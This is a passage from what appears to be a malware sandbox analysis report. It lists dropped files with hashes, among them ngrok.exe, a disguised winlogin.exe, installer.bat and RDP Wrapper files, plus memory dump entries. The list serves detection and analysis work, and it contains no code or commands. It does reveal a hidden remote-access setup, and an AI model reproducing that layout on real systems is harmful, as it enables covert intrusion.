                                                                                                                              0768f9c1d2816d19c4e7f8f05c698c288a3dcfdae3972e556a101e7dcdeb200c5f769f2394499a9ca2d48fa903c849cc69722d7c1b24bda939cb6f2cf06b7420

                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ajrpudnn.hbu.ps1

                                                                                                                              Filesize

                                                                                                                              1B

                                                                                                                              MD5

                                                                                                                              c4ca4238a0b923820dcc509a6f75849b

                                                                                                                              SHA1

                                                                                                                              356a192b7913b04c54574d18c28d46e6395428ab

                                                                                                                              SHA256

                                                                                                                              6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

                                                                                                                              SHA512

                                                                                                                              4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

                                                                                                                            • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                                                                                                              Filesize

                                                                                                                              2KB

                                                                                                                              MD5

                                                                                                                              6bf0e5945fb9da68e1b03bdaed5f6f8d

                                                                                                                              SHA1

                                                                                                                              eed3802c8e4abe3b327c100c99c53d3bbcf8a33d

                                                                                                                              SHA256

                                                                                                                              dda58fd16fee83a65c05936b1a070187f2c360024650ecaf857c5e060a6a55f1

                                                                                                                              SHA512

                                                                                                                              977a393fdad2b162aa42194ddad6ec8bcab24f81980ff01b1c22c4d59ac268bb5ce947105c968de1a8a66b35023280a1e7709dfea5053385f87141389ebecb25

                                                                                                                            • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                                                                                                              Filesize

                                                                                                                              436B

                                                                                                                              MD5

                                                                                                                              f447df5fb3a042f8150c81f417b6752b

                                                                                                                              SHA1

                                                                                                                              c4b95650727adcec0c1d145e790dc73df97d72e7

                                                                                                                              SHA256

                                                                                                                              158a3fa3cd6b0253509fb14dbc351fa81f6947743e7c4b60711d24340ae49c2a

                                                                                                                              SHA512

                                                                                                                              3223bc322dc8112a31c43043e64970209b145441a4ee24539c6673e6f7e01e17f292de35cf4b58a9b92883475c5f70f02e2cba45f766f459b085ae68f2d5aa03

                                                                                                                            • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                                                                                                              Filesize

                                                                                                                              22KB

                                                                                                                              MD5

                                                                                                                              158d254047f2a57e00f644a3e378da0b

                                                                                                                              SHA1

                                                                                                                              1b86a34c3faf4daf4d486c9cd0a78ed2b0333622

                                                                                                                              SHA256

                                                                                                                              2219d0a4f69db6a9e5d3695d73e5d308d7293d98478eb5beb01054a7d3c3e66c

                                                                                                                              SHA512

                                                                                                                              d2d97939a78757ec189473476763cc97a706edf6a3227e4a3dbbb131c9718a72dc444424f31a137357a5a81f1c7a0d8ef85045f0a1f0e288ba197fd796c3e437

                                                                                                                            • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                                                                                                              Filesize

                                                                                                                              18KB

                                                                                                                              MD5

                                                                                                                              b8be49c268b9219fc32c6761f37649bd

                                                                                                                              SHA1

                                                                                                                              8fdd9b732a4d529081d53af125edefe50116fc27

                                                                                                                              SHA256

                                                                                                                              85a2952b4e309beaf06c37875dc7c09aff83bf2647f1cb58a5baf3f5fed818d3

                                                                                                                              SHA512

                                                                                                                              1a09b7d627772f941d2347bfefe4dd678cbc1c8b30e5b4d734d13f23cd017dc1c22d1e30d8d1922848f9f8e525baa97a396fb95a87e68a4b5617792adb1c0e41

                                                                                                                            • C:\Windows\System32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\42EB9B2F19B865DF79A8716F54CDEEEA238B327B

                                                                                                                              Filesize

                                                                                                                              1KB

                                                                                                                              MD5

                                                                                                                              40fc2876421fdea577552065ff3e08f9

                                                                                                                              SHA1

                                                                                                                              260e06deb02fae88c5f52fff7b2c1b38a53e4099

                                                                                                                              SHA256

                                                                                                                              71364ba3ec4d8b73b6d7b8260bd54718c586cb8d5dc5f08cd0445ed70a4983a2

                                                                                                                              SHA512

                                                                                                                              77a794df9796bdc47badc98651daf114c556819e0376ce3c844a5e9e9ea086a9f563ab88d3ddffe153be22baa25e315dfc3b61936203a4d8ad60c74bca50d015

                                                                                                                            • C:\programdata\Windata\installer.bat

                                                                                                                              Filesize

                                                                                                                              1KB

                                                                                                                              MD5

                                                                                                                              895d7ba924e93cefffa7fa4bc0cac6f2

                                                                                                                              SHA1

                                                                                                                              68313bc29146cd23caf4dded3100225d4d0f26a6

                                                                                                                              SHA256

                                                                                                                              c24c176aab99728a62179a4eb95af90f80e48c59884e258d8c454de26bfa2dd8

                                                                                                                              SHA512

                                                                                                                              aaf1c5c43937a42bd1eb49df5ac6a2a76ea2c9f0c74cb52ca7ac6f332aa191b99a50fdf31ef97a0a6b995c0f187c15cd2cdce925b368926dba8190073f20f450

                                                                                                                            • C:\programdata\Windata\ngrok.exe

                                                                                                                              Filesize

                                                                                                                              23.8MB

                                                                                                                              MD5

                                                                                                                              e2eadf60d8f25cae9b29decab461177b

                                                                                                                              SHA1

                                                                                                                              cecc54143cc375af1b9aed0021643b179574e592

                                                                                                                              SHA256

                                                                                                                              1b60097bf1ccb15a952e5bcc3522cf5c162da68c381a76abc2d5985659e4d386

                                                                                                                              SHA512

                                                                                                                              b196ee33855a41c9888420410f55c06b6650c0680210c29075bdf0c09054ce3fa46af10163332715af0dae7a3eb1cb6c5d80cb604ca67f4c32934b8f17361c1f

                                                                                                                            • C:\programdata\Windata\winlogin.exe

                                                                                                                              Filesize

                                                                                                                              7KB

                                                                                                                              MD5

                                                                                                                              9e497a3855c86b45e07ed23710683de1

                                                                                                                              SHA1

                                                                                                                              c9baae1a87fef165e9942119fb19631a2cbda8d8

                                                                                                                              SHA256

                                                                                                                              54b9b8048365c9705d5b39c638c7ce5599a93685b2a44020ede883185409bb9f

                                                                                                                              SHA512

                                                                                                                              da79293ea0a508ea3db40d6041d4d3d414772e32962eaae627e4a750b21872bb50a930bd6c97da86c18cd060e6fd9c3b746e396141ba7b1e38ca8596c5ed84b6

                                                                                                                            • \??\c:\program files\rdp wrapper\rdpwrap.dll

                                                                                                                              Filesize

                                                                                                                              114KB

                                                                                                                              MD5

                                                                                                                              461ade40b800ae80a40985594e1ac236

                                                                                                                              SHA1

                                                                                                                              b3892eef846c044a2b0785d54a432b3e93a968c8

                                                                                                                              SHA256

                                                                                                                              798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4

                                                                                                                              SHA512

                                                                                                                              421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26

                                                                                                                            • \??\c:\program files\rdp wrapper\rdpwrap.ini

                                                                                                                              Filesize

                                                                                                                              128KB

                                                                                                                              MD5

                                                                                                                              dddd741ab677bdac8dcd4fa0dda05da2

                                                                                                                              SHA1

                                                                                                                              69d328c70046029a1866fd440c3e4a63563200f9

                                                                                                                              SHA256

                                                                                                                              7d5655d5ec4defc2051aa5f582fac1031b142040c8eea840ff88887fe27b7668

                                                                                                                              SHA512

                                                                                                                              6106252c718f7ca0486070c6f6c476bd47e6ae6a799cffd3fb437a5ce2b2a904e9cbe17342351353c594d7a8ae0ef0327752ff977dee1e69f0be7dc8e55cf4ec

                                                                                                                            • \??\c:\program files\rdp wrapper\rdpwrap.ini

                                                                                                                              Filesize

                                                                                                                              137KB

                                                                                                                              MD5

                                                                                                                              d6801fc820bf493f5ccbc61145b0841f

                                                                                                                              SHA1

                                                                                                                              037c8d16fcdff9a0ef3136148b3fa02ef9f35f36

                                                                                                                              SHA256

                                                                                                                              fd4499c428c8db74193b78c0847bce152c79f4800a73da6618b6c45489c58033

                                                                                                                              SHA512

                                                                                                                              7c2c047a4c817c3b5db69e2b617060722e7241ef290d77554309c91c8be8de3a6b5f5b0aa2c5c8ba286acfe30486f16b11f0fcd05e3d0960d2712787ddd79171

                                                                                                                            • memory/516-1818-0x0000000000400000-0x000000000056F000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              1.4MB

                                                                                                                            • memory/848-1616-0x0000000000400000-0x000000000056F000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              1.4MB

                                                                                                                            • memory/2512-411-0x0000000006590000-0x00000000068E0000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              3.3MB

                                                                                                                            • memory/2512-675-0x0000000008C00000-0x0000000008C08000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              32KB

                                                                                                                            • memory/2512-670-0x0000000008C10000-0x0000000008C2A000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              104KB

                                                                                                                            • memory/2512-475-0x0000000008AB0000-0x0000000008B55000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              660KB

                                                                                                                            • memory/2512-470-0x0000000008A50000-0x0000000008A6E000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              120KB

                                                                                                                            • memory/2512-469-0x000000006ED30000-0x000000006ED7B000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              300KB

                                                                                                                            • memory/2512-468-0x0000000008A70000-0x0000000008AA3000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              204KB

                                                                                                                            • memory/2512-413-0x0000000006C00000-0x0000000006C4B000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              300KB

                                                                                                                            • memory/2776-1816-0x0000000000400000-0x000000000056F000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              1.4MB

                                                                                                                            • memory/3364-1842-0x0000000000400000-0x000000000056F000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              1.4MB

                                                                                                                            • memory/3416-52-0x00007FFEBBF70000-0x00007FFEBC95C000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              9.9MB

                                                                                                                            • memory/3416-10-0x00000143283C0000-0x0000014328436000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              472KB

                                                                                                                            • memory/3416-11-0x00007FFEBBF70000-0x00007FFEBC95C000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              9.9MB

                                                                                                                            • memory/3416-5-0x0000014328210000-0x0000014328232000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              136KB

                                                                                                                            • memory/3416-2-0x00007FFEBBF73000-0x00007FFEBBF74000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              4KB

                                                                                                                            • memory/3416-20-0x00007FFEBBF70000-0x00007FFEBC95C000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              9.9MB

                                                                                                                            • memory/3416-41-0x00007FFEBBF70000-0x00007FFEBC95C000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              9.9MB

                                                                                                                            • memory/3416-48-0x00007FFEBBF70000-0x00007FFEBC95C000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              9.9MB

                                                                                                                            • memory/3612-309-0x0000000006440000-0x0000000006462000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              136KB

                                                                                                                            • memory/3612-333-0x0000000007C00000-0x0000000007C3C000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              240KB

                                                                                                                            • memory/3612-307-0x00000000036D0000-0x0000000003706000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              216KB

                                                                                                                            • memory/3612-308-0x0000000005D60000-0x0000000006388000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              6.2MB

                                                                                                                            • memory/3612-310-0x00000000064E0000-0x0000000006546000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              408KB

                                                                                                                            • memory/3612-311-0x0000000006650000-0x00000000066B6000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              408KB

                                                                                                                            • memory/3612-380-0x00000000090D0000-0x00000000095CE000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              5.0MB

                                                                                                                            • memory/3612-379-0x00000000088C0000-0x00000000088E2000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              136KB

                                                                                                                            • memory/3612-378-0x0000000008870000-0x000000000888A000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              104KB

                                                                                                                            • memory/3612-377-0x0000000008B30000-0x0000000008BC4000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              592KB

                                                                                                                            • memory/3612-364-0x0000000007CC0000-0x0000000007D36000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              472KB

                                                                                                                            • memory/3612-312-0x00000000066C0000-0x0000000006A10000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              3.3MB

                                                                                                                            • memory/3612-314-0x0000000006ED0000-0x0000000006F1B000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              300KB

                                                                                                                            • memory/3612-313-0x0000000006B80000-0x0000000006B9C000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              112KB

                                                                                                                            • memory/4400-59-0x0000000001020000-0x00000000013ED000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              3.8MB

                                                                                                                            • memory/4400-53-0x0000000001020000-0x00000000013ED000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              3.8MB

                                                                                                                            • memory/4552-1475-0x000001FD7E7F0000-0x000001FD7E7FA000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              40KB

                                                                                                                            • memory/4552-1461-0x000001FD7EB90000-0x000001FD7EBA2000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              72KB

                                                                                                                            • memory/4960-1877-0x0000000000400000-0x000000000056F000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              1.4MB

                                                                                                                            • memory/4972-1881-0x0000000000400000-0x000000000056F000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              1.4MB

                                                                                                                            • memory/5044-1138-0x000000006ED30000-0x000000006ED7B000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              300KB

                                                                                                                            • memory/5116-753-0x000000006ED30000-0x000000006ED7B000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              300KB

                                                                                                                            • memory/5116-1061-0x000000000A4F0000-0x000000000AB68000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              6.5MB

                                                                                                                            • memory/5116-1828-0x0000000000400000-0x000000000056F000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              1.4MB